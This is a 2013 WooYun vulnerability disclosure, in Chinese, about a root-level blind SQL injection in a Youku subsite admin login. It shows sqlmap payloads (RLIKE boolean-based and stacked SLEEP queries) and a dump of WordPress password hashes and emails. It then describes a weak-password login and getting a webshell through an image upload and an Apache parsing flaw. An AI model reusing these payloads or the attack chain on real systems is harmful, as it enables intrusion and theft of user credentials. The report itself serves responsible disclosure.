当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032916

漏洞标题:优酷网root权限盲注漏洞导致数十个分站与数据库沦陷

相关厂商:优酷

漏洞作者: 数据流

提交时间:2013-07-31 11:35

修复时间:2013-09-14 11:36

公开时间:2013-09-14 11:36

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-07-31: 细节已通知厂商并且等待厂商处理中
2013-07-31: 厂商已经确认,细节仅向厂商公开
2013-08-10: 细节向核心白帽子及相关领域专家公开
2013-08-20: 细节向普通白帽子公开
2013-08-30: 细节向实习白帽子公开
2013-09-14: 细节向公众公开

简要描述:

自上个月连续提交3个20rank的sohu都没提交了 最近又看到一群人在刷struts2我都不忍心看wooyun被刷屏....无奈

详细说明:

1,通过google找到分站http://minisite.youku.com/
随手试了试admin manage login 等找到admin1 的后台登陆地址
2,http://minisite.youku.com/admin1/login.php

y1.png


登陆框中username参数加单引号' 出现异常

y2.png


而输入两个单引号就正常了''

y3.png


出现这样的情况就怀疑有注射了
开sqlmap跑了下 果然存在注射

Place: POST
Parameter: username
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: username=asd' RLIKE IF(5146=5146,0x617364,0x28) AND 'OwBw'='OwBw
Type: stacked queries
Title: MySQL > 5.0.11 stacked queries
Payload: username=asd'; SELECT SLEEP(5)--
---
web application technology: Apache
back-end DBMS: MySQL 5.0.11
current user: 'root@%'
sqlmap identified the following


root权限 里面有77个库
3, 找到一个wordpress
http://minisite.youku.com/blog/
通过以上注射点 注射blog库

user_pass,user_login,user_email,user_activation_key
$P$B0mSwAo6Md/Xc72veM7xPbz1CGNdjx1,Editor,[email protected],<blank>
$P$B3/owR5KcpAZ4TSBKB.z/CY.ZbQi2u0,qiqima,[email protected],<blank>
$P$B7LWNj2CAEk1xUuR7bKvQnbdXzwaZC/,admin,[email protected],zwjIDkDyJxAPw0gFMYlY
$P$Bg.5Y/4sI7wSvYFIjJUGWFWg8TXRMf0,luluma,[email protected],<blank>
12061103,youku,[email protected],<blank>


其中Editor为弱密码

y4.png


成功登陆后台

y6.png


4,服务器存在apache解析漏洞
通过上传图片获取webshell

y7.png

漏洞证明:

由于权限配置问题在于导致服务器上几十个站点沦陷

y8.png


修复方案:

版权声明:转载请注明来源 数据流@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-07-31 11:44

厂商回复:

修复中

最新状态:

暂无